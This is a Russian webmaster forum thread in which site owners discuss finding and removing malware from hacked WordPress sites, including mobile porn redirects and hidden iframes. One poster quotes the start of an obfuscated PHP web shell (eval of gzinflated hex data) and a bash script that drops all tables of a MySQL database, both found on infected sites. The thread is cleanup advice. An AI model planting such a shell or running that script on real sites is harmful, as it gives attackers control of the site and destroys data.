Помощник
|
Вредоносный код в wordpress - Mal/JSIfrLd-A, Помогите отловить |
Rxp |
26.2.2012, 2:00;
Ответить: Rxp
Сообщение
#102
|
|
посаны, я смотрю тут собрались специалисты по вредоносным кодам. а никто в вордпрессе у себя не находил код, который редиректит юзеров мобильных телефонов на порнуху? меня с компьютера ни разу не перебрасывало, а юзеры которые заходят через мобилу, жалуются... даже не знаю, где искать код( И такие вирусы найдем и обезвредим! Милости просим! Сообщение отредактировал Rxp - 26.2.2012, 2:02 -------------------- |
|
|
xcomx |
26.2.2012, 22:03;
Ответить: xcomx
Сообщение
#103
|
|
Было заражено 3 проекта на WP. Поискал в теме. там был файл с кодированным кодом. Удалил его. Потом удалил все папки WP и залил заново. Яндекс снял метку вируса. Не стоит код вируса искать везде. Сначало обновите все файлы WP а также плагины на нулевые с офф сайта производителя двига и плагинов. далее если все по старому чистите cache или ищите в upload левые .php , .js файлы и удаляете их. Код можно обнаружить с помощью Веб браузера Google Chrome. Я так и искал. Он видит код на морде сайте. смотрите <iframe если есть и там будет ссылка то вирус сидит дальше. он генерит его постоянно поэтому в коде вы его ненайдете.
Удачи. |
|
|
lulul |
27.2.2012, 20:36;
Ответить: lulul
Сообщение
#104
|
|
Обращалась за помощью к Electric, сегодня яндекс проверил сайт, вирус не обнаружен
|
|
|
Knebekajze |
29.2.2012, 0:51;
Ответить: Knebekajze
Сообщение
#105
|
|
Большущее СПАСИБО за помощь в избавлении от вирусов товарищу Electric =) Да прибудет с ним Сила! Сейчас Яндекс проверит мои сайты, но я уверенна, что там все будет замечательно=)
|
|
|
samdocua |
29.2.2012, 2:38;
Ответить: samdocua
Сообщение
#106
|
|
Товарищи, ставьте на все сайты на вордпрессе плагин File Monitor Plus http://wordpress.org/extend/plugins/wordpr...e-monitor-plus/, а также закрывйте доступ по ip к папкам wp-admin, wp-includes. Также почитайте рекомендации по защите блога http://habrahabr.ru/blogs/wordpress/98083/ и не будет проблем с вирусами
|
|
|
Electric |
29.2.2012, 12:47;
Ответить: Electric
Сообщение
#107
|
|
ставьте на все сайты на вордпрессе плагин File Monitor Plus Если вирус УЖЕ на сайте - никакие "антивирусные плагины" не помогут.Также почитайте рекомендации по защите блога http://habrahabr.ru/blogs/wordpress/98083/ Это не для рядовых пользователей, это для продвинутых...Кстати, вот еще кусок возможного варианта незашифрованого шелла: <?php
$auth_pass = ""; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\ -------------------- |
|
|
Electric |
2.3.2012, 1:04;
Ответить: Electric
Сообщение
#108
|
|
На одном из зараженных сайтов была снесена база... более детальный просмотр файлов показал наличие исполняемого вредоносного скрипта:
#!/bin/bash test "$1" -a "$2" || { echo "Usage: $0 dbname password"; exit 1; } dbname="$1"; dbpasswd="$2"; mysqldump -u$dbname -p$dbpasswd --add-drop-table --no-data $dbname | grep ^DROP | mysql -u$dbname -p$dbpasswd $dbname Кроме того на том сайте нашоделось около десятка различных шеллов и вирусных кодов... -------------------- |
|
|
Rxp |
4.3.2012, 11:13;
Ответить: Rxp
Сообщение
#109
|
|
Привет всем! В блогах вордпресс яндекс нашел Mal/JSIfrLd-A То появляется, то нет, ифрейм 1х1 еле заметный. Поиск по коду внутир файлов на фтп ничего не дал. Ну нет нигде никаких фреймов и такого кода. Наверное вставляется как-то через пхп, но как - не знаю. Инфы в инете не нашел. Помогите пожалуйста отловить. Какие у меня варианты? Стучите в асю (в профиле) поможем удалить вирус! -------------------- |
|
|
Electric |
4.3.2012, 14:02;
Ответить: Electric
Сообщение
#110
|
|
На недавно почищенных сайтах пока без рецедивов.
Заметил еще одну ошибку - иногда пароль и логин от ФТП записуют в конфиг файл... а поскольку у некоторых хостеров логины и пароли на ФТП такие же как и в панели хостинга, то ничего не стоит сломать все сайты на аккаунте. Будьте осторожны, не допускайте такой ошибки. -------------------- |
|
|
Барбариска |
5.3.2012, 9:03;
Ответить: Барбариска
Сообщение
#111
|
|
Есть такая проблема с вирусом. Был на сайте вирус (собственно, может, и есть, он периодически появляется, но не в этом дело). Жил вирус в папках /wp-admin/network/atm/abmlouygtip/number/index.htm, /wp-admin/network/atm/afuyrrbjooit/number/index.htm и еще множестве аналогичных.
Папки все эти я снесла. Но... но теперь в статистике накапливается большое кол-во ошибок 404 из-за вот этих не найденных папок. В результате растет напряг на хостинг. Никто с таким не сталкивался? Я пыталась искать по файлам всего сайта запросы на afuyrrbjooit, abmlouygtip..., но ничего не находится. Попалась одна ссылка на atm и все. |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка. | 19 | Boymaster | 11403 | 20.4.2024, 0:01 автор: Boymaster |
|
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта | 0 | Alex-777 | 946 | 7.4.2024, 18:05 автор: Alex-777 |
|
Перенос сайта на CMS Wordpress | 8 | freeax | 4981 | 10.3.2024, 14:58 автор: freeax |
|
Как настроить в WordPress для SEO оптимизации | 8 | rownong27 | 2486 | 2.3.2024, 12:59 автор: toplinks |
|
Восстановление сайтов из Вебархива на Wordpress. | 39 | freeax | 32797 | 14.2.2024, 14:32 автор: freeax |
Текстовая версия | Сейчас: 25.4.2024, 4:48 |